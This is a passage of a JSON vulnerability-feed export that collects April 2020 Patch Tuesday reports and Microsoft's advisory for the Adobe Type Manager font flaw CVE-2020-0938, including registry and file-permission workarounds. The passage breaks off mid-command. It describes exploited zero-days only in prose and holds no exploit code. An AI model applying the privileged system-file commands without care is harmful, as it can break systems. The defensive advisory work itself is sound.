it\u2019s important to pick one that fits the owner\u2019s needs and provides security updates on an ongoing basis.\n\nKeep in mind that while staying up-to-date on Windows patches is a must, it\u2019s important to make sure you\u2019re updating only after you\u2019ve backed up your important data and files. A reliable backup means you\u2019re not losing your mind when the odd buggy patch causes problems booting the system.\n\nSo do yourself a favor and backup your files before installing any patches. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips. Also, keep an eye on the [AskWoody blog](<https://www.askwoody.com/2020/february-2020-patch-tuesday-foibles/>) from **Woody Leonhard**, who keeps a close eye on buggy Microsoft updates each month.\n\nFurther reading:\n\n[Qualys breakdown on April 2020 Patch Tuesday](<https://blog.qualys.com/laws-of-vulnerabilities/2020/04/14/april-2020-patch-tuesday-113-vulns-19-critical-0-day-patches-sharepoint-adobe-coldfusion>)\n\n[SANS Internet Storm Center on Patch Tuesday](<https://isc.sans.org/forums/diary/Microsoft+April+2020+Patch+Tuesday/26022/>)", "modified": "2020-04-14T22:24:10", "published": "2020-04-14T22:24:10", "id": "KREBS:1093D39181F7F724932AED0E8DA017A8", "href": "https://krebsonsecurity.com/2020/04/microsoft-patch-tuesday-april-2020-edition/", "type": "krebs", "title": "Microsoft Patch Tuesday, April 2020 Edition", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2020-04-15T11:50:59", "bulletinFamily": "info", "cvelist": ["CVE-2020-0910", "CVE-2020-0927", "CVE-2020-0935", "CVE-2020-0938", "CVE-2020-1020", "CVE-2020-1027"], "description": "[](<https://thehackernews.com/images/-YJ1LqrMMEaM/XpX_UksqOuI/AAAAAAAA2qE/3LZJABtjRK0FvjSyceDePk_slKHxeWYmACLcBGAsYHQ/s728-e100/windows-update.jpg>)\n\nIt's **April 2020 Patch Tuesday**, and during these challenging times of coronavirus pandemic, this month's patch management process would not go easy for many organizations where most of the resources are working remotely. \n \nMicrosoft today [released](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Apr>) the latest batch of software security updates for all supported versions of its Windows operating systems and other products that patch a total of 113 new security vulnerabilities, 17 of which are critical and 96 rated important in severity. \n \n\n\n## Patches for 4 Zero-Days Exploited In the Wild\n\n \nMost importantly, [two of the security flaws](<https://thehackernews.com/2020/03/windows-adobe-font-vulnerability.html>) have been reported as being publicly known at the time of release, and the 3 are being actively exploited in the wild by hackers. \n\n\n \nOne of the publicly disclosed flaws, which was also exploited as zero-day, resides in the Adobe Font Manager Library used by Windows, the existence of which Microsoft revealed last month within an early security warning for its millions of users. \n \nTracked as [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>), the remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format. \n \nAs explained in the [previous post](<https://thehackernews.com/2020/03/windows-adobe-font-vulnerability.html>), the affected font library not only parses content when open with a 3rd-party software but also is used by Windows Explorer to display the content of a file in the 'Preview Pane' or 'Details Pane' without having users to open it. \n \nThe second in-the-wild exploited remote code execution flaw ([CVE-2020-0938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938>)) also resides in the Adobe Type Manager Library that triggers when parsing a malicious OpenType font. \n \nBoth of these zero-day flaws were [reported](<https://twitter.com/itswillis/status/1250116355602419713>) to Microsoft in the last week of March by researchers working with Google Project Zero but with a very short full disclosure deadline, which was then mutually extended considering the current global circumstances. \n \nThe third zero-day is an elevation of privilege vulnerability ([CVE-2020-1027](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027>)) in Windows kernel, discovered by the Google Project Zero team, that impacts all supported versions of the Windows operating system\u2014including Windows 10, 8.1 and Server 2008, 2012, 2016, and 2019 editions, as well as Windows 7 for which Microsoft ended its support in January 2020. \n \n\n\n## Other New Bugs Microsoft Patched this Month\n\n \nThe second publicly known issue, which was not exploited in the wild, is an important elevation of privilege vulnerability ([CVE-2020-0935](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0935>)) that resides in the OneDrive for Windows desktop. \n \nThe latest update also includes patches for 5 critical flaws that affect Microsoft Office SharePoint, 4 of which exists due to the failure of the software to check the source markup of an application package, allowing remote attackers to execute arbitrary code on the affected machines. \n\n\n \nWhereas, the 5th SharePoint flaw is a cross-site-scripting (XSS) issue (**CVE-2020-0927**) that can be exploited by an authenticated attacker by sending a specially crafted request to an affected SharePoint server. \n \nThere's another notable flaw, tracked as **CVE-2020-0910 **and rated critical, that affects Windows Hyper-V, allowing a guest virtual machine to compromise the hypervisor, escaping from a guest virtual machine to the host, or escaping from one guest virtual machine to another guest virtual machine. \n \nBesides these, other critical flaws Microsoft patched this month affect Chakra scripting engine, Microsoft Dynamics 365 Business Central, media foundation, graphics components, codecs library and VBScript\u2014all leading to remote code execution attacks. \n \nWindows users and system administrators are highly advised to apply the latest security patches as soon as possible in an attempt to keep cybercriminals and hackers away from taking control of their computers. \n \nFor installing the latest Windows security updates, you can head on to Settings \u2192 Update & Security \u2192 Windows Update \u2192 Check for updates on your PC, or you can install the updates manually. \n\n\nHave something to say about this article? Comment below or share it with us on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) or our [LinkedIn Group](<https://www.linkedin.com/company/thehackernews/>).\n", "modified": "2020-04-15T11:05:48", "published": "2020-04-14T18:24:00", "id": "THN:D8AAE3E21499FA77C4C1B73C1DDA01E1", "href": "https://thehackernews.com/2020/04/windows-patch-update.html", "type": "thn", "title": "Microsoft Issues Patches for 3 Bugs Exploited as Zero-Day in the Wild", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-25T12:10:36", "bulletinFamily": "info", "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "description": "[](<https://1.bp.blogspot.com/-TpSAclc1CUY/XlUH-042UlI/AAAAAAAA2a8/rZXeX3W340I8FcHae_U9qtF8muP0p7aUQCLcBGAsYHQ/s728-e100/chrome-browser-software-update.jpg>)\n\nGoogle yesterday released a new critical software update for its Chrome web browser for desktops that will be rolled out to Windows, Mac, and Linux users over the next few days. \n \nThe latest Chrome 80.0.3987.122 includes security fixes for [three new vulnerabilities](<https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html>), all of which have been marked 'HIGH' in severity, including one that (CVE-2020-6418) has been reportedly exploited in the wild. \n \nThe brief description of the Chrome bugs, which impose a significant risk to your systems if left unpatched, are as follows: \n \n\n\n * **Integer overflow in ICU** \u2014 Reported by Andr\u00e9 Bargull on 2020-01-22\n * **Out of bounds memory access in streams (CVE-2020-6407)** \u2014 Reported by Sergei Glazunov of Google Project Zero on 2020-01-27\n * **Type confusion in V8 (CVE-2020-6418) **\u2014 Reported by Clement Lecigne of Google's Threat Analysis Group on 2020-02-18\n \n\n\n \nThe Integer Overflow vulnerability was disclosed by Andr\u00e9 Bargull privately to Google last month, earning him $5,000 in rewards, while the other two vulnerabilities \u2014 CVE-2020-6407 and CVE-2020-6418 \u2014 were identified by experts from the Google security team. \n \nGoogle has said CVE-2020-6418, which stems from a type confusion error in its V8 JavaScript rendering engine, is being actively exploited, although technical information about the vulnerability is restricted at this time. \n \nThe search giant has not disclosed further details of the vulnerabilities so that it gives affected users enough time to install the Chrome update and prevent hackers from exploiting them. \n \nA successful exploitation of the integer overflow or out-of-bounds write flaws could allow a remote attacker to compromise a vulnerable system by tricking the user into visiting a specially crafted web page that takes advantage of the exploit to execute arbitrary code on the target system. \n \nIt's recommended that Windows, Linux, and macOS users [download and install the latest version](<https://support.google.com/chrome/answer/95414?co=GENIE.Platform%3DDesktop&hl=en>) of Chrome by heading to Help > \"About Chrome\" from the settings menu.\n", "modified": "2020-02-25T11:47:01", "published": "2020-02-25T11:47:00", "id": "THN:DC209DD441842FCD2682680F22D67854", "href": "https://thehackernews.com/2020/02/google-chrome-zero-day.html", "type": "thn", "title": "Install Latest Chrome Update to Patch 0-Day Bug Under Active Attacks", "cvss": {"score": 0.0, "vector": "NONE"}}], "qualysblog": [{"lastseen": "2020-06-03T17:50:28", "bulletinFamily": "blog", "cvelist": ["CVE-2020-0910", "CVE-2020-0927", "CVE-2020-0929", "CVE-2020-0931", "CVE-2020-0932", "CVE-2020-0938", "CVE-2020-0974", "CVE-2020-1020", "CVE-2020-1022", "CVE-2020-1027"], "description": "This month\u2019s Microsoft Patch Tuesday addresses 113 vulnerabilities with 19 of them labeled as Critical. The 19 Critical vulnerabilities cover Adobe Font Manager Library (0-day), SharePoint, Hyper-V, Scripting Engines, Media Foundation, Microsoft Graphics, Windows Codecs, and Dynamics Business Central. Adobe released patches today for ColdFusion, After Effects, and Digital Editions.\n\n### Workstation Patches\n\nThe Scripting Engine, Adobe Font Manager Library, Media Foundation, Microsoft Graphics, and Windows Codecs patches should be prioritized for workstation-type devices, meaning any system that is used for email or to access the internet via a browser. This includes multi-user servers that are used as remote desktops for users.\n\n### Windows Kernel Privilege Escalation\n\nWhile listed as Important, there is also an Actively Attacked privilege escalation vulnerability ([CVE-2020-1027](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027>)) in the Windows Kernel. Often privilege escalation vulnerabilities are \"chained\" with other vulnerabilities resulting in a full system compromise. This patch should be prioritized across all Windows devices.\n\n### Adobe Font Manager Library 0-day\n\nMicrosoft patched two Actively Attacked vulnerabilities ([CVE-2020-0938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938>), [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>)) in the Adobe Font Manager Library that were [announced](<https://blog.qualys.com/laws-of-vulnerabilities/2020/03/25/automatically-discover-prioritize-and-remediate-windows-adobe-type-manager-library-remote-code-execution-vulnerability-adv200006-using-qualys-vmdr>) in March. While Windows 10 systems are partially mitigated against the exploit, all Windows workstations should be prioritized for patching.\n\n### Hyper-V Hypervisor Escape\n\nA remote code execution vulnerability ([CVE-2020-0910](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0910>)) is patched in Hyper-V that would allow an authenticated user on a guest system to run arbitrary code on the host system. Microsoft notes that exploitation of this vulnerability is less likely, but these patches should still be prioritized for all Hyper-V systems.\n\n### SharePoint\n\nMicrosoft has also released patches for SharePoint covering four RCE vulnerabilities ([CVE-2020-0929](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0929>), [CVE-2020-0931](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0931>), [CVE-2020-0932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0932>), [CVE-2020-0974](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0974>)), and one XSS ([CVE-2020-0927](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0927>)). The four RCEs involve uploading a malicious application package to exploit the vulnerabilities. These patches should be prioritized for all SharePoint servers.\n\n### Dynamics Business Central RCE\n\nSimilar to [last month's release](<https://blog.qualys.com/laws-of-vulnerabilities/2020/03/10/march-2020-patch-tuesday-115-vulns-26-critical-microsoft-word-and-workstation-patches>), Dynamics Business Central is affected by a Remote Code Execution vulnerability ([CVE-2020-1022](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1022>)) that could allow attackers to execute arbitrary shell commands on a target system. While this vulnerability is labeled as \u201cExploitation Less Likely,\u201d considering the target is likely a critical server, this should be prioritized across all Dynamics BC/NAV systems.\n\n### Adobe\n\nAdobe issued patches today covering multiple vulnerabilities in [ColdFusion](<https://helpx.adobe.com/security/products/coldfusion/apsb20-18.html>), [After Effects](<https://helpx.adobe.com/security/products/after_effects/apsb20-21.html>), and [Digital Editions](<https://helpx.adobe.com/security/products/Digital-Editions/apsb20-23.html>). The patches for ColdFusion are labeled as [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>), with the others are set to [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>). All patches are labeled as \"Important.\"\n\nWhile none of the vulnerabilities disclosed in Adobe\u2019s release are known to be Actively Attacked today, all patches should be prioritized on systems with these products installed.\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of Patch Tuesday.", "modified": "2020-04-14T18:34:04", "published": "2020-04-14T18:34:04", "id": "QUALYSBLOG:CD5A810958CA7B4F6BB934D2C74500EA", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "April 2020 Patch Tuesday \u2013 113 Vulns, 19 Critical, Zero-Day Patches, SharePoint, Adobe ColdFusion", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-02-11T22:27:16", "bulletinFamily": "blog", "cvelist": ["CVE-2019-2215", "CVE-2020-6418", "CVE-2020-9818", "CVE-2020-9819"], "description": "As mobile devices have become ubiquitous in almost every business process, whether in bank branches, manufacturing sites or retail stores, they are now hosting business applications and data that is subject to regulatory compliance and security. With access to critical corporate resources inside the corporate network, these mobile devices have become critical assets for the organization.\n\n### Mobile Attack Surface Challenges\n\nAlongside this trend, there has been a drastic rise in Android, iOS, and iPadOS vulnerabilities and an increased number of vulnerable apps distributed from authorized app stores. Through these vectors, mobile devices have become preferred targets for attackers to gain an entry point into corporate networks. Last year, for example, [900 million Apple iOS users were affected](<https://www.forbes.com/sites/gordonkelly/2020/05/13/apple-iphone-exploit-vulnerability-ios-13-mail-problem-update-iphone-11-pro-max-u-iphone-xs-max-xr-upgrade/?sh=45195bbc07b7>) by iOS mail app vulnerability CVE-2020-9819 and CVE-2020-9818 exploit. Zecops [demonstrated how to exploit](<https://blog.zecops.com/vulnerabilities/seeing-maildemons-technique-triggers-and-a-bounty/>) these vulnerabilities (MailDemon) by sending oversized email to victims\u2019 devices.\n\nIn another attack, Android mobile devices [were targeted](<https://www.zdnet.com/article/google-reveals-sophisticated-windows-android-hacking-operation/>) using the Google Chrome app vulnerability CVE-2020-6418, a type of bug that incorrectly implements relevant security checks. The attacker tricked victims into visiting a specially crafted web page that gave the attacker an initial foothold on the victim\u2019s device via their browser. The attacker then deployed OS-level vulnerability CVE-2019-2215 to gain privileged control of the victim\u2019s device including access to their data and the corporate network.\n\nIn both cases, the attacks were successful because the organizations were using a traditional vulnerability scanning approach for mobile devices. This approach fails to provide holistic security for mobile devices because it requires devices to connect to the VPN or the organization\u2019s network in order to be scanned for vulnerabilities or patched. Mobile Device Management (MDM) also fails in this case because its \u2018policy-based prevention\u2019 does not assess devices or the apps running on them for the latest vulnerabilities, and it lacks knowledge of the security posture of the device and does not provide flexible patching. \n\nOrganizations are looking for a solution which provides continuous visibility into mobile devices across the enterprise, continuous visibility into the vulnerability and misconfiguration posture of the device and apps, and a workflow for prioritized updates and patching.\n\n### Introducing Qualys VMDR for Mobile Devices\n\nBuilt on the FedRAMP-authorized [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>), [Qualys VMDR for Mobile Devices](<https://www.qualys.com/vmdr-mobile-devices>) extends vulnerability management, detection and response capabilities to mobile device platforms such as Android, iOS, and iPadOS. Qualys Cloud Agent for Android, iOS and iPadOS, available on Google Play Store and Apple App Store, provides continuous visibility, security and patch orchestration for your mobile platforms.\n\nTo learn more about this solution, watch the webinar on March 10: [Seamlessly Expand Vulnerability & Patch Management to Enterprise Mobile Devices](<https://www.brighttalk.com/webcast/11673/469503>).\n\n#### Continuous Visibility and Monitoring of Mobile Devices Connecting to Your Network\n\nKnowing your mobile devices and monitoring their connections to your corporate network is fundamental to their security. With cloud agents deployed on your mobile devices, you get real-time visibility of all the mobile devices across your enterprise, including critical hardware and software details like firmware, OS, and installed applications details, along with location and the network information.\n\nThis mobile device inventory comes as a part of [Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and [Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>).\n\nGain in-depth visibility into mobile devices across your enterprise\n\n#### Real-Time Visibility into Vulnerabilities and Critical Device Settings\n\nWith best-in-class vulnerability assessment for Android, iOS and iPadOS devices, Qualys VMDR for Mobile Devices enables:\n\n * Device vulnerability and exploit assessment covering vulnerabilities from 2016 to the latest for Android, iOS, and iPadOS providing insights into vulnerable OS versions with CVE details and detection of jailbroken/rooted devices,\n * Detection of critical device settings such as encryption disabled, password removed/disabled, Bluetooth settings, etc.,\n * Assessment of app vulnerability detections covering vulnerabilities from 2016 to the latest such as Google Chrome browser vulnerabilities, along with the detection of potentially harmful apps, and\n * Insights into network vulnerabilities and detection of devices connected to insecure or open Wi-Fi networks.\n\nQualys VMDR helps expand your vulnerability management program with configuration assessment by continuously monitoring the critical mobile device configurations as recommended by [National Security Agency (NSA) best practices](<https://www.nsa.gov/What-We-Do/Cybersecurity/Telework-and-Mobile-Security-Guidance/>), such as Bluetooth status, location services, app trusted status, and more.\n\nReal-time visibility into vulnerabilities Real-time visibility into critical settings\n\n#### Remote Response and Seamless Patch Orchestration\n\nTwo of the biggest response challenges in the mobile world are:\n\n * Performing remote actions when the mobile device is not on the VPN or network, i.e. when traditional vulnerability management approaches are not possible, and\n * Determining the appropriate mitigation action, which requires time-consuming research to map application updates to vulnerabilities and then either deploy those updates or uninstall the risky apps.\n\nQualys VMDR for Mobile Devices automatically and continuously correlates the vulnerabilities of Android apps available on Google Play Store with appropriate application updates, significantly decreasing your remediation response time. IT and remediation teams can schedule and deploy those patches from Google Play Store via seamless orchestration provided by VMDR or they can uninstall vulnerable apps.\n\nBased on the security posture of the device, security teams can take actions on all at-risk mobile devices simultaneously, even if the devices are not connected to the VPN or corporate network, leveraging over-the-air, out-of-the-box controls to reset in critical cases or lock devices, change passcodes, or even de-enroll the device.\n\nSeamless patch orchestration with tracking patch status Uninstall the vulnerable app Perform remote actions on the vulnerable devices\n\n#### Vulnerability Posture of Mobile Devices AND Servers in a Single Pane of Glass\n\nOne of the key metrics for vulnerability risk management teams and management is visualization of vulnerability and security posture across hybrid environments, from datacenter servers to endpoints to mobile devices. With mobile data flowing to the Qualys Cloud Platform via VMDR for Mobile Devices, your vulnerability and security teams can continuously inventory all your assets, including mobile devices, in a consolidated manner and gain insights into the vulnerability and misconfiguration posture of your servers and mobile devices in a single pane of glass.\n\nGain visibility into the security posture of different types of assets in a single pane of glass.\n\n### Visibility, Assessment, Correlation and Orchestration\n\nWith the growth of mobile devices, increasing attack surface and data exposure risks, security teams are looking for a solution which goes beyond traditional mobile vulnerability scanning tools. Qualys VMDR for Mobile Devices extends the power of vulnerability & patch management to Android, iOS and iPadOS devices for: \n\n * Compressive visibility into mobile devices, installed apps, and configurations, even if they are not on VPN or network,\n * Continuous vulnerability and end-of-life assessment of devices, OSs, and applications along with monitoring for potential harmful applications,\n * Automatic correlation of vulnerabilities with apps and Android patches, and\n * Orchestration of appropriate response actions such as deploying patches from Google Play Store or uninstalling vulnerable apps.\n\n### Learn More\n\n * Webinar March 10: [Seamlessly Expand Vulnerability & Patch Management to Enterprise Mobile Devices](<https://www.brighttalk.com/webcast/11673/469503>)\n * [Start your free trial](<https://www.qualys.com/try-vmdr-mobile-devices>)\n * [About VMDR for Mobile Devices](<https://www.qualys.com/apps/vulnerability-management-detection-response/mobile-devices>)\n * [User guide](<https://www.qualys.com/docs/qualys-sem-user-guide.pdf>)\n * [Qualys extends the power of VMDR to Android and iOS/iPadOS mobile devices](<https://www.qualys.com/company/newsroom/news-releases/usa/qualys-introduces-vmdr-for-mobile-devices>)", "modified": "2021-02-10T21:17:00", "published": "2021-02-10T21:17:00", "id": "QUALYSBLOG:65D9653A8189263EAD9C1C00AA7E205A", "href": "https://blog.qualys.com/category/product-tech", "type": "qualysblog", "title": "Expand Your Vulnerability & Patch Management Program to Mobile Devices with Qualys VMDR", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2020-08-07T11:48:26", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0938"], "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.\n\nFor all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely. For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane.\n\nThe update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts.\n\nThere are several different workarounds in this section. Not all may apply to all networks.\n\nWorkaround | Applicability \n---|--- \nDisable the Preview Pane and Details Pane in Windows Explorer | Works on all systems but won't mitigate the issue if you open a document with the vulnerable font class \nDisable the WebClient service | Works on all systems but won't mitigate the issue if you open a document with the vulnerable font class \nDisableATMFD registry key using a managed deployment script | Only works on older (before Windows 10) but completely mitigates the issue though can introduce usability issues in rare cases \nDisableATMFD registry key manually | Only works on older (before Windows 10) but completely mitigates the issue though can introduce usability issues in rare cases \nRename ATMFD.DLL | Only works on older (before Windows 10) but completely mitigates the issue though can introduce usability issues in rare cases \n \n**Note:** We do not recommend that IT administrators running Windows 10 implement the workarounds described below. ATMFD.DLL is not present in Windows 10 installations starting with Windows 10, version 1709. Newer versions do not have this DLL. See the **Mitigation** section for more information.\n\n#### **Disable the Preview Pane and Details Pane in Windows Explorer**\n\nDisabling the Preview and Details panes in Windows Explorer prevents the automatic display of OTF fonts in Windows Explorer. While this prevents malicious files from being viewed in Windows Explorer, it does not prevent a local, authenticated user from running a specially crafted program to exploit this vulnerability.\n\nTo disable these panes in Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, and Windows 8.1, perform the following steps:\n\n 1. Open Windows Explorer, click **Organize**, and then click **Layout**.\n 2. Clear both the **Details pane** and **Preview pane** menu options.\n 3. Click **Organize**, and then click **Folder and search options**.\n 4. Click the **View** tab.\n 5. Under **Advanced settings**, check the **Always show icons, never thumbnails** box.\n 6. Close all open instances of Windows Explorer for the change to take effect.\n\nTo disable these panes in all supported client and server versions of Windows 10, perform the following steps:\n\n 1. Open Windows Explorer, click the **View** tab.\n 2. Clear both the **Details pane** and **Preview pane** menu options.\n 3. Click **Options**, and then click **Change folder and search options**.\n 4. Click the **View** tab.\n 5. Under **Advanced settings**, check the **Always show icons, never thumbnails** box.\n 6. Close all open instances of Windows Explorer for the change to take effect.\n\n**Impact of workaround.**\n\nWindows Explorer will not automatically display OTF fonts.\n\n**How to undo the workaround.**\n\nTo re-enable the Preview and Details panes in Windows Explorer for Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, and Windows 8.1:\n\n 1. Open Windows Explorer, click **Organize**, and then click **Layout**.\n 2. Select both the **Details pane** and **Preview pane** menu options.\n 3. Click **Organize**, and then click **Folder and search options**.\n 4. Click the **View** tab.\n 5. Under **Advanced settings**, clear the **Always show icons, never thumbnails** box.\n 6. Close all open instances of Windows Explorer for the change to take effect.\n\nTo re-enable the Preview and Details panes in Windows Explorer for all supported client and server versions of Windows 10, perform the following steps:\n\n 1. Open Windows Explorer, click the **View** tab.\n 2. Select both the **Details pane** and **Preview pane** menu options.\n 3. Click **Options**, and then click **Change folder and search options**.\n 4. Click the **View** tab.\n 5. Under **Advanced settings**, clear the **Always show icons, never thumbnails** box.\n 6. Close all open instances of Windows Explorer for the change to take effect.\n\n#### **Disable the WebClient service**\n\nDisabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround it is still possible for remote attackers who successfully exploit this vulnerability to cause the system to run programs located on the targeted user's computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet.\n\nTo disable the WebClient Service, perform the following steps:\n\n 1. Click **Start**, click **Run** (or press the **Windows Key** and **R** on the keyboard), type **Services.msc** and then click **OK**.\n 2. Right-click **WebClient** service and select **Properties**.\n 3. Change the Startup type to **Disabled**. If the service is running, click **Stop**.\n 4. Click **OK** and exit the management application.\n\n**Impact of workaround.**\n\nWhen the WebClient service is disabled, Web Distributed Authoring and Versioning (WebDAV) requests are not transmitted. In addition, any services that explicitly depend on the WebClient service will not start, and an error message will be logged in the System log. For example, WebDAV shares will be inaccessible from the client computer.\n\n**How to undo the workaround.**\n\nTo re-enable the WebClient Service, perform the following steps:\n\n 1. Click **Start**, click **Run** (or press the **Windows Key** and **R** on the keyboard), type **Services.msc** and then click **OK**.\n 2. Right-click **WebClient** service and select **Properties**.\n 3. Change the Startup type to **Automatic**. If the service is not running, click **Start**.\n 4. Click **OK** and exit the management application.\n\n#### **DisableATMFD registry key using a managed deployment script**\n\n**Please Note:** This workaround works for Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, and Windows 8.1. ATMFD.DLL is not present in Windows 10 installations starting with Windows 10, version 1709.\n\n**Note** Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe.\n\n 1. Create a text file named **ATMFD-disable.reg** that contains the following text:\n \n \n Windows Registry Editor Version 5.00\n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows]\n \"DisableATMFD\"=dword:00000001\n \n\n 2. Run regedit.exe.\n 3. In Registry Editor, click the **File** menu and then click **Import**.\n 4. Navigate to and select the** ATMFD-disable.reg** file that you created in the first step. (**Note** If your file is not listed where you expect it to be, ensure that it has not been automatically given a .txt file extension, or change the dialog\u2019s file extension parameters to **All Files**).\n 5. Click **Open** and then click **OK** to close Registry Editor.\n 6. Restart the system.\n\n**Impact of workaround**\n\nApplications that rely on embedded font technology will not display properly. Renaming ATMFD.DLL could cause certain applications to stop working properly if they use OpenType fonts. Microsoft Windows does not release any OpenType fonts natively. However, third-party applications could install them and they could be affected by this change.\n\n**How to undo the workaround.**\n\n 1. Create a text file named **ATMFD-enable.reg** that contains the following text:\n \n \n Windows Registry Editor Version 5.00\n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows]\n \"DisableATMFD\"=dword:00000000\n \n\n 2. Run regedit.exe.\n 3. In Registry Editor, click the **File** menu and then click **Import**.\n 4. Navigate to and select the **ATMFD-enable.reg** file that you created in the first step. (Note If your file is not listed where you expect it to be, ensure that it has not been automatically given a .txt file extension, or change the dialog\u2019s file extension parameters to **All Files**).\n 5. Click **Open** and then click **OK** to close Registry Editor.\n 6. Restart the system.\n\n#### **DisableATMFD registry key manually**\n\n**Please Note:** This workaround works for Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, and Windows 8.1. ATMFD.DLL is not present in Windows 10 installations starting with Windows 10, version 1709. Newer versions do not have this DLL. See the **Mitigation** section for more information.\n\n**Note** Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe.\n\n 1. Run **regedit.exe** as Administrator.\n 2. In Registry Editor, navigate to the following sub key (or create it) and set its DWORD value to 1: `HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\DisableATMFD, DWORD = 1`\n 3. Close Registry Editor and restart the system.\n\n**Impact of workaround**\n\nApplications that rely on embedded font technology will not display properly. Renaming ATMFD.DLL could cause certain applications to stop working properly if they use OpenType fonts. Microsoft Windows does not release any OpenType fonts natively. However, third-party applications could install them and they could be affected by this change.\n\n**How to undo the workaround.**\n\n 1. Run **regedit.exe** as Administrator.\n 2. In Registry Editor, navigate to the following sub key and set its DWORD value to 0: `HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\DisableATMFD, DWORD = 0`\n 3. Close Registry Editor and restart the system.\n\n#### **Rename ATMFD.DLL**\n\n**Please Note:** This workaround works for Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, and Windows 8.1. ATMFD.DLL is not present in Windows 10 installations starting with Windows 10, version 1709. Newer versions do not have this DLL. See the **Mitigation** section for more information.\n\nFor 32-bit systems:\n\n 1. Enter the following commands at an administrative command prompt:\n \n \n cd \"%windir%\\system32\"\n takeown.exe /f atmfd.dll\n icacls.exe atmfd.dll /save atmfd.dll.acl\n icacls.exe atmfd.dll /grant Administrators:(F) \n rename atmfd.dll x-atmfd.dll\n \n\n 2. Restart the system.\n\nFor 64-bit systems:\n\n 1. Enter the following commands at an administrative command prompt:\n \n \n \tcd \"%windir%\\system32\"\n \ttakeown.exe /f atmfd.dll\n \ticacls.exe atmfd.dll /save atmfd.dll.acl\n \ticacls.exe atmfd.dll /grant Administrators:(F) \n \trename atmfd.dll x-atmfd.dll\n \tcd \"%windir%\\syswow64\"\n \ttakeown.exe /f atmfd.dll\n \ticacls.exe 